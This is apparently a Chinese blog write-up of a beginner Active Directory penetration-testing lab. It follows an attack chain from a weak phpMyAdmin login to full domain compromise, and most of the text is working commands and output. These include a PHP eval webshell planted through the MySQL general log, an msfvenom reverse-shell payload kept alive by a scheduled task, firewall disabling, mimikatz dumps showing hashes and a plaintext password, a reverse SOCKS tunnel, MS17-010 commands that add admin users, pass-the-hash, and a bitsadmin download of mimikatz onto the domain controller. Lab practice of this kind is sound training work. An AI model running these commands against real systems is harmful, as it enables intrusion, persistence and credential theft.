前言
虽然网上已经有一些较为完整的靶场做题记录,并且此入门靶场也较为简单。但是在做题过程中仍然遇到一些其他文章中没有提到或者忽略的问题以及操作,故希望能为像我一样刚入门渗透的小小白们带来一点点的帮助。
搭建靶场
准备
靶场下载:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
解压文件直接解压,在vm中选择打开虚拟机,打开文件夹即可,并分别将虚拟机命名如下
win7->VM1
win2003->VM2
win8->VM3
环境搭建
攻击机选择:kali
VM1的网卡配置如下:(注意网络适配器的顺序不能调换)
VM2的网卡配置:选择** 自定义(VMnet1)**
VM3的网卡配置:选择 自定义(VMnet1)
在打开虚拟机后,VM2和VM3都要求重置密码,并要求强密码。
VM1打开C盘下phpstudy并启动。(如果出现dll报错,重启虚拟机或者重新解压并打开)
定位
靶场已经配置好了
VM1->跳板机,服务器
VM2->域成员
VM3->DC
渗透过程
前渗透
看一眼VM1的外网IP
扫描目录
kali当时还没安装dirsearch
git config --global http.sslVerify false
git clone https://github.com/maurosoria/dirsearch.git扫描得到结果
[15:50:14] 200 - 14KB - /l.php
[15:50:16] 200 - 2KB - /phpmyadmin/README
[15:50:17] 200 - 71KB - /phpinfo.php
[15:50:17] 301 - 241B - /phpmyadmin -> http://192.168.37.128/phpmyadmin/
[15:50:17] 301 - 241B - /phpMyAdmin -> http://192.168.37.128/phpMyAdmin/
[15:50:18] 200 - 4KB - /phpMyAdmin/
[15:50:18] 200 - 4KB - /phpmyAdmin/
[15:50:18] 200 - 4KB - /phpMyAdmin/index.php
[15:50:18] 200 - 4KB - /phpmyadmin/index.php
[15:50:18] 200 - 4KB - /phpmyadmin/
[15:50:18] 200 - 4KB - /phpMyadmin/
[15:50:18] 200 - 32KB - /phpmyadmin/ChangeLog弱口令
phpmyadmin界面,有验证码,尝爆破难度较高(除非写PIL?)
自己手动输几个常见弱口令搭配
username_list=['root','admin']
password_list=['root','','admin','123456','password']结果root/root就能进入后台了。
得到版本信息
软件版本: 5.5.53 - MySQL phpStudy 2014
找到Mysql漏洞
在之前的获取到的版本信息后,去网上搜了一下有无版本CVE,但并没有找到可以利用的地方。常对数据库操作,就仔细去找mysql里面又没有利用点。
尝试sqlmap一把梭
sqlmap -d "mysql://root:root@192.168.28.130:3306/test" —os-shell
返回报错,不允许外部登录root,看看能不能改配置
尝试添加用户
在数据库配置界面可以找到添加用户
直接添加用户matoujin,并给全权限
sqlmap -d "mysql://matoujin:jinlei@192.168.28.130:3306" —os-shell
注意要安装库:
pip3 install pymysql
显示mysql参数错误,我猜测是mysql服务器的一些配置限制了利用,去检查一下
尝试用用户matoujin连接mysql库,但是访问被拒绝了,去改一下mysql库的权限。给mysql库再上了个matoujin1的全权限用户python3 sqlmap.py -d "mysql://matoujin1:jinlei@192.168.52.130:3306/mysql" --os-shell
最终还是不可行
成功利用日志写入
检查全局变量show variables like '%general%';
set global general_log = on;set global general_log_file = 'C:\phpstudy\WWW\shell.php';
这个时候,在对应路径就会生辰shell.php。select '<?php @eval($_POST["matoujin"]);?>';
再把全局变量关闭,防止文件过大set global general_log = off;
最后用蚁剑连接就可以了
后渗透
信息收集
系统信息
antsword C:> systeminfo
域:god.org
登录服务器:\\OWA
antsword C:>net config workstation
计算机名 \STU1
计算机全名 stu1.god.org
用户名 Administrator
工作站域 GOD
工作站域 DNS 名称 god.org
登录域 GOD
antsword C;>ipconfig
本地链接 IPv6 地址. . . . . . . . : fe80::fcff:cf71:1487:9c27%11(首选)
IPv4 地址 . . . . . . . . . . . . : 192.168.52.143(首选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 192.168.52.2
DHCPv6 IAID . . . . . . . . . . . : 234884137
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
DNS 服务器 . . . . . . . . . . . : 192.168.52.138
8.8.8.8
TCPIP 上的 NetBIOS . . . . . . . : 已启用IPv4 地址 . . . . . . . . . . . . : 192.168.28.130(首选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
DHCP 服务器 . . . . . . . . . . . : 192.168.28.254
DHCPv6 IAID . . . . . . . . . . . : 738200617
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
DNS 服务器 . . . . . . . . . . . : 192.168.28.1
TCPIP 上的 NetBIOS . . . . . . . : 已启用
既然我们访问的是192.168.28.130,那么另一个ip(192.168.52.143)就是服务器的内网IP。
端口信息
antsword C:>nmap 192.168.52.143
Host is up (0.0000050s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1028/tcp open unknown
1029/tcp open ms-lsa
3306/tcp open mysql
上MSF马
上传
KALI打开metasploit,造反弹shell的payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.28.129 LPORT=10086 -e x86/shikata_ga_nai -i 5 -f exe -o backdoor.exe
这里提供多种payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.28.129 LPORT=10086 -e x64/shikata_ga_nai -i 5 -f exe -o backdoor.exe或者受害机配合定时任务执行(每分钟执行一次)
aschtasks /create /tn solrindex /tr C:\backdoor.exe /sc minute /mo 1
LHOST设置为KALI的外网IP,10086端口为kali的被访问端口
在此之前,关闭目标受害机的防火墙antsword C:>NetSh Advfirewall set allprofiles state offantsword C:>NetSh Advfirewall show allprofiles
然后,通过antsword将kali中刚生成的backdoor.exe上传到受害机的C盘。
`
运行
根据刚才的设置,先在kali运行msf> use exploit/multi/handlermsf> set payload windows/x64/meterpreter/reverse_tcpmsf> set lhost 192.168.28.129msf> set lport 10086
然后目标受害机运行backdoor.exe
然后kali端就能产生一个session,储存meterpreter
进程迁移
个人感觉手动进程迁移比较稳妥
meterpreter > ps | find 'explore'
Filtering on 'explore'
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
2136 2276 explor x64 1 GOD\Admi C:\Windo
er.exe nistrato ws\explo
r rer.exe
meterpreter > getpid
Current pid: 2828
meterpreter > migrate 2136
[*] Migrating from 2828 to 2136...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 2136meterpreter > getsystem
提升权限。
暂时没有其他操作,保存到后台meterpreter > backfground
返回session编号1。
补充可能情况
如果使用armitage,在这里直接用远程桌面是无法使用的,并且使用meterpreter>shell也会没有回显,尽量使用metasploit操作。
如果操作过程中没有回显,可能是进程挂了。在armitage下,蚁剑再跑一遍就会重新生成一个session;而在metasploit下,重新使用模块muti/handlerrun一下就好。
连接VM1远程桌面
确认一下目标的远程桌面端口有没有开放msf > nmap 192.168.28.130 -p 3389
PORT STATE SERVICE
3389/tcp closed ms-wbt-server
开放端口
msf使用模块post/windows/manage/enable_rdpset session 1run
再次检查端口是否开放
PORT STATE SERVICE
3389/tcp open ms-wbt-server
获取登录密码
方法一
通过antsword将mimikatz.exe上传到目标受害机的C:\下。
打开session 1的shell
msf > sessions -i 1
meterpreter > shell
C:\>mimikatz.exe
mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords
Authentication Id : 0 ; 2571959 (00000000:00273eb7)
Session : Interactive from 1
User Name : Administrator
Domain : GOD
Logon Server : OWA
Logon Time : 2021/11/9 12:10:32
SID : S-1-5-21-2952760202-1353902439-2381784089-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : GOD
* LM : edea194d76c77d87840ac10a764c7362
* NTLM : 8a963371a63944419ec1adf687bb1be5
* SHA1 : 343f44056ed02360aead5618dd42e4614b5f70cf
tspkg :
* Username : Administrator
* Domain : GOD
* Password : hongrisec@2019
wdigest :
* Username : Administrator
* Domain : GOD
* Password : hongrisec@2019
kerberos :
* Username : Administrator
* Domain : GOD.ORG
* Password : hongrisec@2019
ssp :
credman :方法二
meterpreter> load kiwi
meterpreter>creds_allUsername Domain Password
(null) (null) (null)
Administrator GOD hongrisec@2019
这样就获得了目标受害机的密码
登录远程桌面
msf > rdesktop 192.168.28.130
这里注意用GOD\Administrator登录。
横向渗透1--信息收集
解决shell后编码问题chcp 65001
配置路由
meterpreter>run autoroute -s 192.168.52.0/24
这时候kali已经可以访问内网了
扫描域内存活主机
C:\Windows\system32>for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="
Reply from 192.168.52.138: bytes=32 time<1ms TTL=128
Reply from 192.168.52.141: bytes=32 time<1ms TTL=128
Reply from 192.168.52.143: bytes=32 time<1ms TTL=128扫描端口
msf > nmap 192.168.52.138
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
49155/tcp open unknown
49161/tcp open unknown
49167/tcp open unknownmsf > nmap 192.168.52.141
21/tcp open ftp
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
777/tcp open multiling-http
1025/tcp open NFS-or-IIS
1028/tcp open unknown
1029/tcp open ms-lsa
1030/tcp open iad1
6002/tcp open X11:2
7001/tcp open afs3-callback
7002/tcp open afs3-prserver
8099/tcp open unknown445端口利用
看到两个IP都打开了445端口msf > use auxiliary/scanner/smb/smb_ms17_010msf > set rhosts 192168.52.141 192.168.52.138msf > run
两个主机都是likely的
远程桌面利用准备之端口
msf >use auxiliary/admin/smb/ms17_010_command
msf > set rhost 192.168.52.141
......
msf > set command whoami
nt authority\system
......//查看对方开放端口
msf >set command netstat -na
打开3389端口使用远程桌面
set command wmic RDTOGGLE WHERE ServerName=\'%COMPUTERNAME%\' call SetAllowTSConnections 1
或者set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 1 /f'(注意单引号,如果不用单引号,要用\转义双引号)
开启的化,/d为1,关闭则为0。
Executing (\ROOT-TVI862UBEH\ROOT\CIMV2:Win32_TerminalServiceSetting.ServerName="ROOT-TVI862UBEH")->SetAllowTSConnections()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ReturnValue = 0;
};
看看3389的状态,已经是开放的
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
远程桌面利用之socks代理
选用earthworm。
kali重新打开一个终端执行命令,将本机的1080端口请求转发给4444./ew_for_linux64 -s rcsocks -l 1080 -e 4444
rcsocks 0.0.0.0:1080 <--[10000 usec]--> 0.0.0.0:4444
init cmd_server_for_rc here
start listen port here
然后把ew上传到VM1跳板机上meterpreter > upload ../ew-master c://
蚁剑上执行ew_for_Win.exe -s rssocks -d 192.168.28.129 -e 4444
然后刚刚新开终端socks客户端就能有反应了
kali再开一个终端执行vim /etc/proxychains.conf
文末添加
socks 192.168.28.129 1080
或者
socks 127.0.0.1 1080
记得把其他行#注释
为了将msf也加入代理msf >use uxiliary/server/socks_proxy
执行远程桌面
msf > proxychains4 rdesktop 192.168.52.141
提供管理员用户
继续使用msf模块msf >use auxiliary/admin/smb/ms17_010_command
添加用户set command net user matoujin jinlei@2001 /add
并添加用户为管理员set command net localgroup administrators matoujin /add
然后就可以登录VM2了
补充
网上有许多教程都使用正向shell或者反弹shell来进行getshell,但是我尝试了下都没有成功。
当然,由于改过密码,hash传递登录也没有成功。这里只成列一下使用方法。大家可以自己去尝试
exploit/windows/smb/ms17_010_psexec正向
payload:windows/meterpreter/bind_tcp
payload&module的rhost(s) :192.168.52.141:
rport:445
lport:4444
windows/smb/ms17_010_eternalblue反弹
哈希传递登录
在VM1跳板机上执行一下命令
sekurlsa::pth /domain:god.org /user:administrator /ntlm:8a963371a63944419ec1adf687bb1be5最后我使用的方法
web服务器(VM1跳板机)的WWW根目录下放置mimikatz.exe
使用admin/smb/ms17_010_command
先在DC上执行set NetSh Advfirewall set allprofiles state off
DC下载mimikatz
bitsadmin /transfer name http://192.168.52.143/mimikatz.exe c:\mimikatz.exe
DC运行
set command 'c://mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full""'
到此,渗透结束,所有密码都在手里了
域控的远程桌面也就可以登录了
Comments | NOTHING